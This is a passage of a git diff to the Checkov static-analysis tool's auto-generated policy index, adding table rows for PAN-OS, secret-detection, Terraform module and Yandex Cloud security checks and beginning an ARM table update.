[PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 3671 | CKV_PAN_5 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'application' set to 'any' | Ansible | [PanosPolicyNoApplicationAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoApplicationAny.yaml) | +| 3672 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 3673 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 3674 | CKV_PAN_6 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'service' set to 'any' | Ansible | [PanosPolicyNoServiceAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoServiceAny.yaml) | +| 3675 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 3676 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 3677 | CKV_PAN_7 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_ip' and 'destination_ip' both containing values of 'any' | Ansible | [PanosPolicyNoSrcAnyDstAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcAnyDstAny.yaml) | +| 3678 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 3679 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 3680 | CKV_PAN_8 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure description is populated within security policies | Ansible | [PanosPolicyDescription.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyDescription.yaml) | +| 3681 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 3682 | CKV_PAN_9 | resource | panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 3683 | CKV_PAN_9 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure a Log Forwarding Profile is selected for each security policy rule | Ansible | [PanosPolicyLogForwarding.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogForwarding.yaml) | +| 3684 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 3685 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 3686 | CKV_PAN_10 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session end is enabled within security policies | Ansible | [PanosPolicyLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLoggingEnabled.yaml) | +| 3687 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 3688 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 3689 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 3690 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 3691 | CKV_PAN_12 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Ansible | [PanosIPsecAuthenticationAlgorithms.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecAuthenticationAlgorithms.yaml) | +| 3692 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 3693 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 3694 | CKV_PAN_13 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure protocols | Ansible | [PanosIPsecProtocols.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecProtocols.yaml) | +| 3695 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 3696 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 3697 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 3698 | CKV_PAN_14 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Ansible | [PanosZoneProtectionProfile.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneProtectionProfile.yaml) | +| 3699 | CKV_PAN_15 | resource | panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 3700 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 3701 | CKV_PAN_15 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Ansible | [PanosZoneUserIDIncludeACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneUserIDIncludeACL.yaml) | +| 3702 | CKV_PAN_16 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session start is disabled within security policies except for troubleshooting and long lived GRE tunnels | Ansible | [PanosPolicyLogSessionStart.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogSessionStart.yaml) | +| 3703 | CKV_PAN_17 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_zone' and 'destination_zone' both containing values of 'any' | Ansible | [PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml) | +| 3704 | CKV_SECRET_1 | Artifactory Credentials | secrets | Artifactory Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3705 | CKV_SECRET_2 | AWS Access Key | secrets | AWS Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3706 | CKV_SECRET_3 | Azure Storage Account access key | secrets | Azure Storage Account access key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3707 | CKV_SECRET_4 | Basic Auth Credentials | secrets | Basic Auth Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3708 | CKV_SECRET_5 | Cloudant Credentials | secrets | Cloudant Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3709 | CKV_SECRET_6 | Base64 High Entropy String | secrets | Base64 High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3710 | CKV_SECRET_7 | IBM Cloud IAM Key | secrets | IBM Cloud IAM Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3711 | CKV_SECRET_8 | IBM COS HMAC Credentials | secrets | IBM COS HMAC Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3712 | CKV_SECRET_9 | JSON Web Token | secrets | JSON Web Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3713 | CKV_SECRET_11 | Mailchimp Access Key | secrets | Mailchimp Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3714 | CKV_SECRET_12 | NPM tokens | secrets | NPM tokens | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3715 | CKV_SECRET_13 | Private Key | secrets | Private Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3716 | CKV_SECRET_14 | Slack Token | secrets | Slack Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3717 | CKV_SECRET_15 | SoftLayer Credentials | secrets | SoftLayer Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3718 | CKV_SECRET_16 | Square OAuth Secret | secrets | Square OAuth Secret | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3719 | CKV_SECRET_17 | Stripe Access Key | secrets | Stripe Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3720 | CKV_SECRET_18 | Twilio API Key | secrets | Twilio API Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3721 | CKV_SECRET_19 | Hex High Entropy String | secrets | Hex High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3722 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | +| 3723 | CKV_TF_2 | module | module | Ensure Terraform module sources use a tag with a version number | Terraform | [RevisionVersionTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionVersionTag.py) | +| 3724 | CKV_YC_1 | resource | yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3725 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3726 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3727 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3728 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3729 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3730 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3731 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3732 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3733 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | +| 3734 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | +| 3735 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | +| 3736 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | +| 3737 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | +| 3738 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | +| 3739 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | +| 3740 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | +| 3741 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | +| 3742 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | +| 3743 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3744 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3745 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3746 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3747 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3748 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3749 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3750 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3751 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 3752 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 3753 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | +| 3754 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | +| 3755 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | +| 3756 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | +| 3757 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | +| 3758 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | +| 3759 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | +| 3760 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 3761 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 3762 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | +| 3763 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 3764 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 3765 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3766 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3767 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3768 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3769 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3770 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | --- diff --git a/docs/5.Policy Index/arm.md b/docs/5.Policy Index/arm.md index 3047a744ddc..2b7adc1507d 100644 --- a/docs/5.Policy Index/arm.md +++ b/docs/5.Policy Index/arm.md @@ -6,103 +6,129 @@ nav_order: 1 # arm resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | -| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | -| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) | -| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | -| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | -| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | -| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | -| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | -| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 9 | CKV_AZURE_9 | 